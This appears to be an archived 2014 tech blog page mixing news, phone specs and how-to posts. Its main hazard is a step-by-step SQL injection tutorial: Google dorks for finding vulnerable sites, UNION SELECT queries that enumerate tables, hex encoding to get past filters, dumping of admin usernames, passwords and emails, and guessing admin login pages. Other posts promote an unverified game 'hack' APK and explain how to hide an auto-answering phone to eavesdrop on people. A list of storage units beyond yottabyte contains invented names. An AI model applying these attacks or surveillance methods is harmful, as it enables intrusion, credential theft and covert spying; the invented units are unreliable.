January 31, 2014

Yahoo Faced Major Email Hacking

Posted by Unknown
Usernames and passwords of some of Yahoo's email customers have been stolen and used to gather personal information about people those Yahoo mail users have recently corresponded with, the company said Thursday.
Yahoo didn't say how many accounts have been affected. Yahoo is the second-largest email service worldwide, after Google's Gmail, according to the research firm comScore. There are 273 million Yahoo mail accounts worldwide, including 81 million in the U.S.

It's the latest in a string of security breaches that have allowed hackers to nab personal information using software that analysts say is ever more sophisticated. Up to 70 million customers of Target stores had their personal information and credit and debit card numbers compromised late last year, and Neiman Marcus was the victim of a similar breach in December.


"It's an old trend, but it's much more exaggerated now because the programs the bad guys use are much more sophisticated now," says Avivah Litan, a security analyst at the technology research firm Gartner. "We're clearly under attack."

Yahoo Inc. said in a blog post on its breach that "The information sought in the attack seems to be names and email addresses from the affected accounts' most recent sent emails."

That could mean hackers were looking for additional email addresses to send spam or scam messages. By grabbing real names from those sent folders, hackers could try to make bogus messages appear more legitimate to recipients.

"It's much more likely that I'd click on something from you if we email all the time," says Richard Mogull, analyst and CEO of Securois, a security research and advisory firm.

The bigger danger: access to email accounts could lead to more serious breaches involving banking and shopping sites. That's because many people reuse passwords across many sites, and also because many sites use email to reset passwords. Hackers could try logging in to such a site with the Yahoo email address, for instance, and ask that a password reminder be sent by email.

Litan said hackers appear to be "trying to collect as much information as they can on people. Putting all this stuff together makes it easier to steal somebody's identity."

Yahoo said the usernames and passwords weren't collected from its own systems, but from a third-party database.


Because so many people use the same passwords across multiple sites, it's possible hackers broke in to some service that lets people use email addresses as their usernames. The hackers could have grabbed passwords stored at that service, filtered out the accounts with Yahoo addresses and used that information to log in to Yahoo's mail systems, said Johannes Ullrich, dean of research at the SANS Institute, a group devoted to security research and education.

The breach is the second mishap for Yahoo's mail service in two months. In December, the service suffered a multi-day outage that prompted Yahoo CEO Marissa Mayer to issue an apology.

Yahoo said it is resetting passwords on affected accounts and has "implemented additional measures" to block further attacks. The company would not comment beyond the information in its blog post. It said it is working with federal law enforcement.
Read More

Samsung Galaxy Note 3 Neo with Android 4.3 for February launch

Posted by Unknown
Samsung has finally unveiled its Galaxy Note 3 Neo phablet, without revealing the price details. The news was confirmed via Samsung Poland, which also announced that the Galaxy Note 3 Neo will be available in two variants: a 3G and an LTE model dubbed Galaxy Note 3 Neo LTE+.

The press note by Samsung Poland further informs that the Samsung Galaxy Note 3 Neo will hit the global market in February, and will be available in three colour variants - Black, Green and White.



Samsung phone

Much like Samsung's Galaxy Note phablet series, the Galaxy Note 3 Neo also comes with S Pen. Both the Galaxy Note 3 Neo variants come with near identical innards, except that the 3G model is powered by a 1.6GHz quad-core (unspecified chipset), while the LTE variant is powered by a hexa-core processor (two 1.7GHz Cortex A15 + four 1.3GHz quad-core Cortex A7). The Galaxy Note 3 Neo runs Android 4.3 Jelly Bean out-of-the-box.

Other specifications of the Samsung Galaxy Note 3 Neo include a 5.5-inch HD (720x1280 pixels) Super AMOLED display; 2GB of RAM; 16GB inbuilt storage, which is further expandable up to 64GB via microSD card, and 3100mAh battery. The new phablet from Samsung sports an 8-megapixel rear camera with LED flash and BSI sensor, while there is a 2-megapixel front-facing camera also featuring BSI sensor. Connectivity options on the device include Wi-Fi, GPS, GLONASS, NFC, Bluetooth, infrared and 3G.




The Samsung Galaxy Note 3 Neo comes with preloaded app galore that include Samsung Apps, Samsung ChatON, Samsung WatchON, Samsung Link, Screen Mirroring, S Voice, S Health, Group Play, Smart Scroll, Smart Pause, Air View, Story Album and S Translator among others. The S Pen comes with Air Command and Easy Clip feature, and also supports Multi Window and S Note.

The Galaxy Note 3 Neo also features Google apps such as Google Search, Gmail, Google+, Google Maps, Play Books, Play Movies, Play Music, Play Store, Play Games, Hangouts, Voice Search, and YouTube. The phablet comes with dimensions 148.4x77.4x8.6mm and weighs 162.5 grams.

Spacification


Display : 5.50-inch
Processor : 1.6GHz
Front Camera : 2-megapixel
Resolution : 720x1280 pixels
RAM : 2GB
OS : Android 4.3
Storage : 16GB
Rear Camera : 8-megapixel
Battery capacity : 3100mAh
Read More

BBM for Android 2.3 Gingerbread will launch in February

Posted by Unknown
BBM

BlackBerry, the popular Canadian smartphone brand, is all set to bring its BBM or Blackberry Messenger service to Android-powered handsets running the OS version 2.3 Gingerbread. The messaging service was earlier only available for devices running Android 4.0 Ice Cream Sandwich or higher.

"We've got some exciting BBM news for Android Gingerbread users - you've been asking and we've heard you loud and clear. We're now pleased to announce that BBM will soon also be available on Android Devices running Gingerbread (v2.3.3+)," stated Jeff Gadway, head of product and brand marketing of BBM, on Blackberry's official blog.

BBM for Android Gingerbread OS is currently moving into an external Beta testing ahead of its launch next month. Gadway also mentioned that currently "Gingerbread represented about 21 percent of the total Android platform" which is quite a good number to rollout the BBM, according to the firm.

It has been previously reported that as early as February, BlackBerry may introduce the missing BBM Voice and BBM Channels features on both the Android and iOS platforms.

Additionally, the Canadian mobile maker is said to have revealed recently that it does not have plans to launch the popular BlackBerry Messenger (BBM) app on Windows Phone-based smartphones.

Trusted Reviews quotes BlackBerry's Senior Director of BBM Business Development, David Proulx, as saying the nonexistence of a BBM application for Windows Phone was "entirely market driven," and stated that the decision is not a "religious thing," but is instead merely a choice made on the basis of a lack of consumer demand.
Read More

January 30, 2014

How to Enable or Disable Google Chat History

Posted by Unknown
If you are using Google account, then you might be aware with Google Chat service. Basically Google allows users to chat with their Google contacts while using the Google email service at a single time. The Google chat is a web based chat system that works pretty good like an instant PC messenger. It does not require any third party plugin, addon or app.

Google chat has some cool options like text chatting, share emoticons, call the user, send files, etc. And like other instant chat rooms software, Google chat also keeps the chat records in your account by default. It automatically records the all chat history. It means your chat partner or anyone else can easily look into your past chat sessions with access.


If you are an only account user and other Google accounts are not connect with your account, then it may not be a problem. But if the email account is shared, then you could be in a great trouble. All in case, if you are using a family or a company account.

Google have two options to enable, disable the chat history. The very first option will allow users to completely disable the chat history. After disabling the chat history, your future chats will not be recorded at all, so that it cannot be accessed or searched by any person after the sessions closes.

Save or Never Save Google Chat History

Simply log in to your Gmail account and click on the small Gear Icon located on the top right corner near by your profile photo. Now click on the Settings and switch to Chat tab. Click here to directly visit to Google Chat Settings page.





Here you will see two options, to disable Google chat history, simply select the option Chat offand to enable chat history, just select the Chat on and click Save Changes.

Other Cool Options for Google Chat Settings

Sometimes users only want to block Google chat history of a particular person or want to delete old chat recording histories.

Remove Google Chat History: To look into the previous chat history that has been recorded by Google earlier, simply type in:chat into the search bar of Gmail homepage and hit enter. The entire Google chat history will appear right in front of you with the option to delete them from records.

Turn off Chat Recording: To disable chat recording for a particular contact during chat, click on the More (down arrow icon) located on the top right corner of the chat window and select Go off the record. This option will block chat history for a particular contact, with that user Google chat history will no longer saved neither in your Gmail account nor the chat partner’s account.

Read More

Different Types of Bits of a Data Storage Media

Posted by Unknown
The bit is the smallest unit of data, however it can be count up to coperbyte. To understand the types of bits, it is mandatory to get a proper picture of hierarchy. In this post we are sharing the complete details of a bits range and can goes upto the coperbytes. So lets know about the complete list of different types of bits or data storage such as kilobyte(KB), megabyte(MB), gigabyte(GB), terabyte(TB), etc.
data-storage
Many people asked me personally as well as through mail from all around the world about all types of memory data storage media. So here I am providing a complete list or chart of all different types of data storage capacity from bit to coperbyte.
All Types of Bits or Data Storage Capacity

Below you will see the each values of a computer or server data storage media devices.
1 Bit = Binary Digit
8 Bits = 1 Byte
1024 Bytes = 1 Kilobyte
1024 Kilobytes = 1 Megabyte
1024 Megabytes = 1 Gigabyte
1024 Gigabytes = 1 Terabyte
1024 Terabytes = 1 Petabyte
1024 Petabytes = 1 Exabyte
1024 Exabytes = 1 Zettabyte
1024 Zettabytes = 1 Yottabyte
1024Yottabytes = 1 Brontobyte
1024 Brontobytes = 1 Geopbyte
1024 Geopbyte=1 Saganbyte
1024 Saganbyte=1 Pijabyte
1024 Pijabyte = Alphabyte
1024 Alphabyte = Kryatbyte
1024 Kryatbyte = Amosbyte
1024 Amosbyte = Pectrolbyte
1024 Pectrolbyte = Bolgerbyte
1024 Bolgerbyte = Sambobyte
1024 Sambobyte = Quesabyte
1024 Quesabyte = Kinsabyte
1024 Kinsabyte = Rutherbyte
1024 Rutherbyte = Dubnibyte
1024 Dubnibyte = Seaborgbyte
1024 Seaborgbyte = Bohrbyte
1024 Bohrbyte = Hassiubyte
1024 Hassiubyte = Meitnerbyte
1024 Meitnerbyte = Darmstadbyte
1024 Darmstadbyte = Roentbyte
1024 Roentbyte = Coperbyte…
I wish you will like this post, please share your comments below or spread this information with your relatives, friends and colleagues.
Read More

January 28, 2014

Octro Teen Patti Hacking 2014

Posted by Unknown
Teen patti is becoming most Famous game in indian Market nowadays.It was started on april 2013.and become Top on Android Games.This game provide Two type of User.One is play it as a guest and another is play with your facebook account.




Facebook account is most probably using to play this game.They will Give you 10000 Chips to play game when u sign up.and its having different type of tables with boot value 2 ,4 ,8 ,20 ,40 ,50 ,100 ,400 ,1000 and much more.




Now coming on main topic.most of the user want more and more coin.so here we give solution.we made hack apk file of this game with unlimited chips hack.we give you step by step information in following step.


Steps by Step Process: 

>> Download Teen Patti – Indian Poker Hack from link below.
>> When, you find links, choose iOS or Android option Download.
>> OK, after finish download, you must open [iOS or Android]_hack. rar
>> Now you must connect Device to PC.
>> After connect, move files from .rar to internal memory(iOS) or to SD-card(Android).
>> The hack must be in …/data/Teen Patti – Indian Poker/(there). >> OK. now let’s start hack! 


File Information:

>> Works on New version game!
>> Works on Android phones and tablets, and on iOS Devices including iPhone, iPad,iPad Mini, and iPod Touch.
>> Tested by many people. And a lot of creators of hacks.
>> 100% SAFE.
>> Easy to use! Just click and wait few seconds. 


Download Files From Here:

>>> Click below to Download for Android


>>> Click below to Download for IOS



For Older Version of game you can use following method

99 billion chips in octro teen patti

i am going to show you how can you earn 99 billion chips using your iphone/ipod. its very simple

Following step by step

>>do not need to root your device. just follow the instruction.
>>Login with your facebook account.
>>Go to public table first, play a single hand.
>>Then create private table with boot value of 100,

and invite andy or kiri (system controlled bots) play single hand. then leave the table and log off.

>>Go tomy files/android/obb. and delete teen patti folder.
>> Then log in with your facebook account and you will see 99billion chips in you account

Thankyou and enjoy the game it is 100% working.


Like us On Facebook -->> www.facebook.com/techdomz

Read More

How to Hack Website Using SQL Injection

Posted by Unknown


As per Wikipedia, SQL injection is a code injection method that crack a security power happening in the database layer of an application. The weakness is available when client info is either mistakenly separated for string break characters installed in SQL statements or client information is not specifically and subsequently out of the blue executed. It is an example of a more broad class of vulnerabilities that can happen at whatever point one programming or scripting dialect is installed inside another. SQL injection assaults are otherwise called SQL injection attack.
you can likewise do it by using a few softwares, here we are managing without utilization of tools. 
In the event that you need to do effortlessly with help of apparatuses then read my past instructional exercise using HAVIJ Here.
Let us have a look at methods of this tutorial..

Step 1: Website Assessment 

  • Finding a vulnerable site 
  • Determining the amount of columns 
  • Finding which sections are defenseless 

Step 2: Gathering Information 

  • Determining the SQL version 
  • Finding the database 

Step 3: The Good Part 

  • Finding the table names 
  • Finding the sections names 
  • Displaying the section contents
  • Finding the administrator page 
Let us start now.

Website Assessment

With the goal for us to begin misusing a site, we should first know precisely what we are infusing into. This is the thing that we will be covering in Part One, alongside how to survey the data that we accumulate. 

1. Finding a vulnerable site 

Powerless sites can be discovered utilizing dorks (I will be list at the end of this post), either in Google or with an exploit scanner. On the off chance that you are new to the expression "dorks", 
Dorks are site URLs that are conceivably vulnerable. In SQL injection these dorks see like this: 
Code: 
inurl:page.php?id= 
This will be inputted into Google's search bar and in light of the "inurl:" some portion of the dork, the web crawler will return comes about with URLs that contain similar characters. A website that have this dork on their site might be vulnerable against SQL injection. 
Presently suppose we found the page: 
Code: 
http://www.thesite.com/page.php?id=1 
Keeping in mind the end goal to test this site we should simply include a " either in the middle of the "=" sign and the "1" or after the "1" so it would appear like this: 
Code: 
http://www.thesite.com/page.php?id=1' 
or, then again 
http://www.thesite.com/page.php?id='1 
By hitting enter, if this site restores a mistake, for example, 
Code: 
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 5
Or, then again something comparable, this implies it's vulnerable against injection.

2.Determining the amount of columns 

In the case that we need to utilize command and get comes about we should know what number of columns there are on a site. 
To locate the quantity of column we compose a question with increasing esteems until we get a blunder, this way,
Code:
http://www.thesite.com/page.php?id=1 ORDER BY 1-- <---No error
http://www.thesite.com/page.php?id=1 ORDER BY 2-- <---No error
http://www.thesite.com/page.php?id=1 ORDER BY 3-- <---No error
http://www.thesite.com/page.php?id=1 ORDER BY 4-- <---No error
http://www.thesite.com/page.php?id=1 ORDER BY 5-- <---ERROR!
This means that there are four columns!
ATTENTION! INCLUDE THE DOUBLE NULL (--) AFTER THE QUERY.
VERY IMPORTANT!


3. Finding which columns are vulnerable
So we know that there are four columns now we have to find out which ones are vulnerable to injection. To do this we will use the UNION and SELECT queries while keeping the double null (--) at the end of the string.

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,2,3,4--

Don't forget to put the extra null(-) in between the "=" sign and the value (the number).


page.php?id=-1

Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database which we will see in Part Two.


Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.


1. Determining the SQL version.

Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version 4.

If we look back to the end of Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2 as an example). The command should look like this:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,@@version,3,4--

Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".

If the website still does not display the version try using unhex(hex()) which looks like this:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--

NOTE: If this method is used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines:

Code:

5.1.44-community-log

Which is the version of the SQL for the website.

NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

2. Finding the database

To find the database we use a query like the one below:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

This could sometimes return more results than necessary and so that is when we switch over to this query instead:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,concat(database()),3,4--

You now have the name of the database! Congratulations. Copy and paste the name somewhere safe, we'll need it for later.

Part Three - The Good Part

This is the fun part where we will find the usernames, emails and passwords!

1. Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

It may look long and confusing but once you understand it, it really isn't so. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--


What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:

Code:


http://www.thesite.com/page.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--


Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st Tongue

You now have all the table names!

2. Finding the column names

Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s),

tblUser(s) and so on but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex.

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.

2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".

Hex/Char Converter

http://www.swingnote.com/tools/texttohex.php

3. Click convert.

4. Copy the string of numbers/letters under Hex into your query so it looks like this:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

3. Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:

Code:

http://www.thesite.com/page.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon ( which will group the username:password:email for the individual users just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to Section Four.

4. Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:

Code:
http://www.thesite.com/admin
http://www.thesite.com/adminlogin
http://www.thesite.com/modlogin
http://www.thesite.com/moderator

Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program

Reiluke has coded one for that as well. Search Admin Finder by Reiluke.

And that conlcudes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!

Source : https://tipstrickshack.blogspot.in
Read More

January 27, 2014

Listen Someone’s Conversation Secretly – Spy Trick

Posted by Unknown
Peoples keep on searching about the spy trick to listen someone’s conversation secretly on the internet. There are thousands of spy software apps available on the market, however they are useless. These spy apps are not actually works as expected. So, in order to help our readers to find the best way to spy someone by listening to their secret conversation, here we are posting a spy tutorial.
spy-mobile-trick
Well, in this trick you will be able to hear the conversations among someone from your cell phone. You will be able to hear each words spoken between them. After trying this spy trick with your cell phone, you will feel like you have a powerful spy monitoring tool on your hand.
To make your spy gadget, you will need the following stuffs.
  • A Mobile Phone
  • A pair of Headset (should be compatible with your phone).
  • Active Listening Skills
Don’t worry we are not going to discuss about any paid mobile apps, tool or software. This is a simple home made trick to prank with someone. You can use this trick for fun as well as it could be very useful for you. A simple mobile phone and a headset is enough to use this trick, you do not need to invest even a single bucks.

Use a Mobile Phone to Spy Someone

1. Connect the headset with your cell phone.
2. Look around the phone settings under phone menu and find for enhancement or headset.Select the ‘enhancement in use’ as headset or headphone (example for Nokia C2:- Menu => Settings => Accessories => Headset).
3. Simply “enable” or “on” automatic answer so that all incoming calls are automatically answered.
4. Now go the Profile settings and set it to silent profile or set the ringing volume to zero and do not forget to disable the vibration alert. Also make sure that the display and incoming calls lights of your cell phone are turned off or place your phone in such place where the phone’s lights cannot be noticed. These settings are mandatory so that your phone will not make any notification when a new call lands.
Just place your mobile phone in a hidden place like below Sofa set, flower pots, behind curtains; from where all the conversation voice can be easily heard through this cell phone.

How to Spy Phone to Hear Conversation

To hear conversations between someone scretly, just follow above given instructions and call on your hidden phone number from any other mobile phone. As you have set your cell phone to automatically answer, as soon as you will call to that hidden phone, your call will be answered automatically and you would be able to hear conversation sectretly :)
# Extra Tips: If you are using a smartphone like Samsung galaxy or any other phone, then install any call recording software to record that coversation for later use.
Note: You need to be little smarter while spy the things on how you will manipulate the situration just incase you have cought.
Read More

Samsung Galaxy Grand Neo with 5-inch display listed online

Posted by Unknown


Samsung's much-anticipated smartphone, the Galaxy Grand Neo, has been listed on the Samsung Jordan website, along with the handset's specifications.

The Galaxy Grand Neo has not been given a price yet, though the smartphone quite obviously falls into the mid-range segment based on the specifications. The availability of the handset is only shown for the city of Amman as of yet.

Samsung Galaxy Grand Neo's Android version has not been mentioned on the official page but,based on previous rumours, the handset is expected to come with Android 4.2 or 4.3 Jelly Bean. The device is also known as the Galaxy Grand Lite in some regions, with the model number GT-I9060 common for both.

The smartphone also supports dual-SIM with no word on dual standby functionality. The Galaxy Grand Neo features a 5.1-inch TFT screen with WVGA (800 x 480 pixel) resolution. An unspecified quad-core processor clocked at 1.2GHz powers the device alongside 1GB of RAM.

The camera options for the handset includes 5-megapixel rear and a VGA front-facing camera. Galaxy Grand Neo also features LED-flash support and auto-focus feature for the rear shooter along with the 720p video recording capability.

Samsung Galaxy Grand Neo will arrive with a 16GB in-built storage, which can be expanded up to 64GB via microSD card. The handset also has a support for 3G networks along with Wi-Fi b/g/n (2.4GHz support), Wi-Fi Direct, Bluetooth 4.0 LE, GPS/AGPS and more under its connectivity options.

The smartphone is powered by a 2,100mAh battery, which can run up to 8 hours on 3G Internet usage and up to 10 hours under Wi-Fi Internet usage. Samsung Galaxy Grand Neo measures 143.7 x 77.1 x 9.6mm in dimensions, and weighs in at 163 grams.


Galaxy Grand Neo additionally features a multi-window functionality, which has been previously seen in Samsung Galaxy Grand 2 and Galaxy Note 3. The handset also comes with a modified one-handed operation keypad designed to make calls and send texts without using both the hands.

While the Galaxy Grand Neo's price remains unannounced, a Dutch online retailer is quoting an unlocked price of 260 euros, or roughly Rs. 22,200. 

: Spacification :

Display : 5.01 inch

Processor : 1.2 GHz

Front Camera : 0.3 megapixel

Resolution : 480 x 800 pixels

RAM : 1 GB

Os : Android

Storage : 16 GB

Rear Camera : 5-megapixel

Battery capacity : 2100 mAh



Read More

January 26, 2014

Top 10 Best Websites to Download Games for PC - Free Sites

Posted by Unknown
Games, more Games, more and more games! Yeah, this article is about Games. The favorite thing many people love irrespective of their ages is a computer game. The main problem comes when we have to pay for downloading the games which we love to play. Here this article is about 10 sites to download games for your PC.




1. Acid Play :

Acid Play has grown into one of the more reliable free gaming websites around. It offers more than 860 free game downloads. All games listed on AcidPlay are reviewed and given a percentage rating. The reviews and ratings are a great guide on determining the quality of the free game.



2. AllGamesAtoZ :

AllGamesAtoZ is a newer site that offers fewer than 100 freeware games. Most of the games can be found on other freeware game sites as well.

3. Caiman.us :

Caiman.us is a purely freeware game website, you won't find any demos or shareware games here. It boasts an impressive 4,630 games (3,395 unique games) and is one of the most frequently updated freeware gaming websites I've seen.


4. Fullgames.sk :

Fullgames.sk lists a decent number of free computer games both downloadable freeware and free online game but they are also listed along with other retail game assets such as demos and trailers.


5. GameHippo :

GameHippo offers reviews, links, and information on a wide variety of freeware PC games. It's a revival of the original Game Hippo site that went down back in 2008. While it does not have as many game's listed as the original (as of Nov 2009), it's library of freeware games is slowly building nearly everyday. Hopefully the new site will be able to exceed what the original offered.




Home of the Underdogs is a freeware/abandon ware site that offers a vast number of titles for download. It is a virtual gold mine for many classic out of print games and has grown to a library of over 5,000 games. The list of freeware game titles is fairly impressive but it's been quite some time since this site has been updated. Update Sept 2009 - Home of the Underdogs has gone through a number of fan supported redesigns and relaunch leading to multiple sites that are host some (but not all) of the games found on the original.


7. Mega Games :

MegaGames has more info on retail game assets such as cheats, demos, and patches but it does have an excellent free computer game section that is definitely worth a look. Most games are hosted on MegaGames and/or provide links/info to the official game sites.


8. Noodan :

Noodan had loads of freeware games and free online games. Navigation could be better but once you get use to the site it's fairly easy to see what's new and there is a text search available.


Planet Freeplay is a great source for finding quality freeware games by offering easy to use navigation and more than 1500 downloadable freeware and online games. Listed front and center of the Planet Freeplay home page are the latest freeware titles that have been added to the site. These listings provide the game title, a small preview screenshot and a short description.


Reloaded provides is a free computer game site dedicated to remakes of classic/retro video games and community made freeware games. Layout and navigation of Reloaded is very nice with screenshots and descriptions of all games listed in it's directory.
Read More

How to Change Blogger Labels in Grey Style

Posted by Unknown
Here at Techdomz , we keep on posting blogger tutorials to help our blogger friends to make their blog more beautiful and attractive. In this blogger tutorial you will learn how to change default blogger labels design in grey style using a simple CSS code.
So lets see how to change blogger labels in grey bricks style. It will change blogger labels or category in simple grey box with easy CSS styled coding as most of the blogger use on their blogs. It is very simple, beautiful and mostly used style labels. Each category or label shows in grey border color and looks very clear to navigate.

Change Blogger Labels Design in Grey Style

Follow below instructions to convert default blogger labels or category into grey style. Give it a try to give your BlogSpot or Blogger labels more attractive look than before.
1. Go to Blogger Dashboard, then click on Layout tab and click on Add Gadget. Now add Labels gadget and Unchecked “Show Number Of Post Per Label” and click on Save button.
2. Click on Template tab and search ]]></b:skin> by pressing Ctrl + F. Now copy below CSS code and paste the copied code just above/before the ]]></b:skin>.
.list-label-widget-content ul{ list-style-type:none; padding-left:0px !important; display:inline-block !important;}.list-label-widget-content li { display:inline-block; }
.list-label-widget-content li a {color: #777;font: 9px verdana;text-transform: uppercase;transition: border-color .218s;background:#f4f4f4;background: -webkit-gradient(linear, 0% 40%, 0% 70%, from(#F5F5F5), to(#F1F1F1));display: inline-block;text-shadow: 0 1px 0#fff;-webkit-transition: border-color .218s;-moz-transition: border .218s;-o-transition: border-color .218s;transition: border-color .218s;background:#f3f3f3;background: -webkit-gradient(linear, 0% 40%, 0% 70%, from(#F5F5F5), to(#F1F1F1));background: -moz-linear-gradient(linear, 0% 40%, 0% 70%, from(#F5F5F5), to(#F1F1F1));border: solid 1px#ccc;border-radius: 2px;-webkit-border-radius: 2px;-moz-border-radius: 2px;margin: 0 4px 4px 0;padding: 3px 5px;text-decoration: none;}.list-label-widget-content li a:hover {color: #333;border-color: #999;-moz-box-shadow: 0 2px 0 rgba(0, 0, 0, 0.2) -webkit-box-shadow:0 2px 5px rgba(0, 0, 0, 0.2);box-shadow: 0 1px 2pxrgba(0,0,0,0.15);}
3. Thats all you had to do. Simply Save your template now and visit your blog .
Read More

January 25, 2014

Find Windows XP Product Key from Windows CD

Posted by Unknown
Windows Xp operating system is using by most of the people all around the world due to its great features and user freindly interface. As of now Microsoft is not supplying Windows XP for sale and if you have lost your Windows XP product key, see this Windows trick to find Windows XP product key from Windows CD or disk itself without any software.




When you install Windows XP from a bootable CD, it always required to insert a product or license key. So in this post we will let you know how you can grab license key of your windows XP. Most of the people do not keep the product key safely and they forgot or misplaced it, so do not worry just follow below procedure to get product key right from your installation disk.


Find Windows XP Product Key from Windows XP CD

Insert Windows XP installation CD into your computer’s CD/DVD drive and explore it. (Go to My Computer from desktop, and then right click on the CD/DVD drive and click on explore or open). Now simply open i386 folder and find the “UNATTEND.TXT” file (the file name was just Unattend). Right Click on Unattend and open it with notepad. Last step, scroll down the file until you go to last line of file and woo ! you got the product key at the bottom of file. Product key is written front of you.

You can also visit Online IT Store to buy Genuine IT Product online without visiting anywhere. It also saves your valuable time.
Read More

January 24, 2014

How to Password Protect USB Ports of Your Computer

Posted by Unknown
We keep on posting articles on computer tutorials and today we got a computer tricks by which you can learn how to password protect USB ports of a desktop computer or laptop in Windows XP, Windows Vista and Windows 8. A small portable application would help you to do so.




Many computer users try to do their best to enhance the security of their laptops and desktop computers and do a lots of stuff to secure their systems so that no one can go through their personal stuffs. Data stealing is always being a big concern. Mostly data is being stolen by USB ports using external hard drives, pen drives, memory cards and other data storage devices.

Well, in this post we are going to let you know about the USB Port Locked 4.0. This is a portable app means you don’t need to install this app on your computer. This application will help you to secure your PC from unauthorized access of USB ports. You can simply lock or unlock your system’s USB ports in a single click.

If you want to restrict your system’s USB ports for the security reasons, this security utility software will help you. The awesome feature of this USB Port application is; it does not lock your Printer’s USB port on which port your printer’s USB cable is connected. This application is 100% free and safe. To download this USB locker app, you do need to register yourself anywhere to use it.
Read More